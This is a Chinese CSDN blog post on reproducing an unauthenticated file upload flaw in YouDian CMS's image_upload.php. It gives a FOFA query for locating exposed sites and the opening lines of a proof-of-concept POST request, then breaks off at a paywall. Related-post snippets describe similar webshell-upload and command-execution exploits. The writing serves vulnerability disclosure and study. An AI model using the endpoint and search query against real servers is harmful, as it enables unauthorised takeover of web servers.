友点CMS image_upload.php 文件上传漏洞复现

已于 2024-02-20 21:35:01 修改
阅读量814 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: php web安全 安全
于 2024-02-20 21:34:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/136198897
版权
本文介绍了友点CMS的一款网站管理系统,重点讨论了其image_upload.php文件上传漏洞,该漏洞可能导致攻击者执行任意代码并控制web服务器。复现环境中通过FOFA查询到相关应用,修复建议包括限制接口访问和升级到安全版本。
摘要由CSDN通过智能技术生成

0x01 产品简介

友点CMS是一款高效且灵活的网站管理系统,它为用户提供了简单易用的界面和丰富的功能。无论是企业还是个人,都能通过友点CMS快速搭建出专业且美观的网站。该系统支持多种内容类型和自定义模板,方便用户按需调整。同时,它具备强大的SEO功能,能提升网站在搜索引擎中的排名。友点CMS还支持多语言设置,适应国际化需求。总的来说,友点CMS是网站建设的理想选择,既高效又易用。

0x02 漏洞概述

友点CMS建站系统image_upload.php 接口处存在文件上传漏洞,未经身份认证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

FOFA:app="友点建站-CMS"

0x04 漏洞复现

PoC

POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64;
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
专栏目录
订阅专栏
漏洞复现】深信服 行为感知系统 日志中心 c.php 远程命令执行
alert['Hello World']
07-17 410
深信服 行为感知系统 日志中心 c.php存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限
漏洞复现友点CMS image_upload.php 任意文件上传漏洞
alert['Hello World']
07-15 327
友点CMS image_upload.php 文件 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 WebShell,控制服务器权限,执行任意命令等。友点企业网站管理系统》(YouDianCMS系统)集电脑网站、手机网站、微信、APP、小程序于一体,共用空间,数据自动同步,是五合一企业建站专业解决方案。
友点建站系统image_upload.php存在文件上传漏洞
qq_36334672的博客
04-03 464
友点CMS建站系统image_upload.php 接口处存在文件上传漏洞,未经身份认证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
YouDianCMS 友点系统 CKEditor 任意文件上传
qq_36334672的博客
03-04 2009
友点CMS存在任意文件上传漏洞,攻击者通过漏洞可以上传恶意文件,获取服务器权限。
狮子鱼CMS image_upload.php 任意文件上传
孤桜懶契
03-29 4520
漏洞描述 网站系统为狮子鱼社区团购系统,网上用的也比较多,我fofa上搜了一下,大概有6-7千多。主要用户各种购物,本文主要介绍其中两个文件上传漏洞漏洞复现以及漏洞工具分享。 漏洞影响 s ✅狮子鱼CMS 空间测绘 d ⭕FOFA:"/seller.php?s=/Public/login" 漏洞复现 POC POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1 Host: ip Content-Type
ckeditor php 上传图片_ckeditor上传图片 for php
weixin_34681072的博客
03-08 179
CKEditor是非常经典的一款富文本编辑器。最近项目中用到了,但是图片上传功能未打通,三天各种资料查询研究,终于搞清楚怎么打通。1、未打通时点击富文本编辑器图片栏时,是没有上传的tab栏的。此刻需要做以下操作:在ckeditor/plugins/image/dialogs/image.js中查找id:"Upload",hidden:!0,改为id:"Upload",hidden:false。奇迹...
漏洞复现】狮子鱼CMS文件上传漏洞(image_upload.php)
晚风不及你
02-11 1697
狮子鱼CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
海洋CMS admin_notify.php 远程代码执行漏洞复现(CVE-2024-30565)
0xSec
06-12 1265
海洋CMS admin_notify.php 接口处存在远程代码执行漏洞,经过身份验证的远程攻击者可利用该漏洞执行任意代码,写入后门文件,进而控制整个web服务器。
苹果CMSv10最全系统标签,模板标签仿站必备
热门推荐
苹果cms10好看的模板
01-06 1万+
原文摘自:https://www.mytheme.cn/article.html ==模板结构= │─template/1/ 模板1 │ ├─info.ini 模板信息文件 │ ├─ads 广告文件目录 │ ├─js js文件 │ ├─css css文件 │ ├─images 图片文件 │ └─html 模板文件目录 │ └─art 文章模块模板目录 │ └─comment 评论模块模板目录 │ ...
苹果V10附件参数配置
从这里找回被遗忘的东西
08-10 2785
苹果CMSV10针对上传附件提供了一系列功能,其他参数配置一目了然,本次重点解释关于【保存方式】对应的操作。 本地保存,这个不用多说了,就是上传到本地服务器。 远程访问,前提数据库共用,做站群时候用到,设置-> 图片远程URL,站群统一访问该URL下的图片资源。 FTP存储,配置FTP服务器的IP、账号、密码,之后在后台上传图片时会自动同步到FTP存储服务器当中。 注意:记得...
文件上传漏洞-通过.htaccess文件绕过
m0_73902453的博客
10-30 235
3.先将.htaccess上传上去,然后再打开抓包上传木马文件(1.php),然后将名字修改成1.jpg,因为刚刚的.htaccess已经上传到服务器,告诉服务器.jpg文件可以当作.php文件执行。通过这个文件,网站管理员可以进行各种配置,例如重定向、访问控制、URL重写等。结尾的文件都当作 PHP 脚本来处理,而不是作为普通文本文件或图像文件。这意味着,即使它们有文本或影像文件的扩展名,服务器将尝试执行其中的 PHP代码。2.这里以upload-labs(less-4)为例,我们先来看看靶场的源代码。
PHP文件包含漏洞
佛系摆烂
10-29 518
PHP 文件包含漏洞(File Inclusion Vulnerability)是一种常见的 Web 安全漏洞,发生在用户对 PHP 文件包含函数(如 include、require、include_once、require_once)的输入缺乏过滤和验证时。攻击者可以利用这个漏洞来包含服务器上任意文件,甚至是远程文件(如果服务器允许),从而获取敏感信息或执行任意代码。
群控系统服务端开发模式-应用开发-业务架构逻辑开发Redis封装
龙哥·三年风水从2011年开始做IT工作,从ps画图到前端开发->后端开发->框架开发->业务架构设计及开发->业务需求整理、开发->技术经理->技术总监
10-28 292
群控系统服务端开发模式-应用开发-业务架构逻辑开发Redis封装
除了wordpress CMS外,还有什么CMS值得我们使用?
weixin_42832157的博客
10-28 460
因为考虑到扩展和安全的问题,开始使用PageAdmin CMS,大概使用了大概2年,发觉它基本能满足我所有的建站需求,重要一点是,它安全性高,能满足等级定级备案的二级和三级,而且它的扩展方式也是我所喜欢的,跟手机APP一样的,随着使用者的需求,任意通过应用中心下载和安装,随着使用。作为建站的小白,前端不会开发、后台不会编写,用CMS来搭建网站是最理想的建站方式,经过线上的站长推荐,我认识了wordpress CMS,来自国外的一套CMS,使用上非常方便,熟悉时间不需要太长,也能快速进入建站的过程。
windows中的route
weixin_45778311的博客
10-26 451
在 Windows 操作系统中,route命令用于显示或修改本地 IP 路由表。以下是一些常用的route。
Unsafe Fileupload-pikachu
zhangqqa的博客
10-30 767
安全文件上传漏洞概述文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨,则攻击着可能会上传一些恶意的文件,比如一句话木马,从而导致后台服务器被webshell。所以,在设计文件上传功能时,一定要对传进来的文件进行严格的安全考虑。
学习路之TP6--workman安装
Green
10-30 289
分析:最新版本需要TP8,或装低版本的。首先通过 composer 安装。及config目录下的。
PHP如何对输出进行转义
最新发布
sheji888的专栏
10-31 304
PHP中,对输出进行转义是为了防止跨站脚本攻击(XSS)和其他安全问题。PHP提供了多种函数来对输出进行转义,这些函数根据输出的上下文(如HTML、JavaScript、URL等)而有所不同。在实际开发中,应该根据具体情况选择合适的转义函数,并且尽量使用现代的安全措施(如预处理语句、参数化查询)来防止常见的安全问题。对单引号、双引号、反斜杠和NULL字符进行转义,主要用于SQL查询中的字符串字面量。自动对特殊字符进行转义,使其安全地用于JavaScript中。常用于将用户输入的数据插入到HTML中。
Lampiao靶机入侵实战
zhuge_long的专栏
10-26 516
在Kali的命令提示符下搜索:searchsploit dirty或者直接在exploit-db.com在线搜索dirty均可,存在多个脏牛漏洞,具体哪一个是可用的,需要逐步尝试。当获取到Shell后,第一步便是使用getuid来查看当前用户的权限,发现是普通用户:www-data,所以还需要尝试提权。顺带拖库,根据Drupal的文件结构,查找到/var/www/html/sites/default/settings.php文件中存在数据库连接信息。(2)尝试爆破SSH,无果。爆出很多Drupal漏洞
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值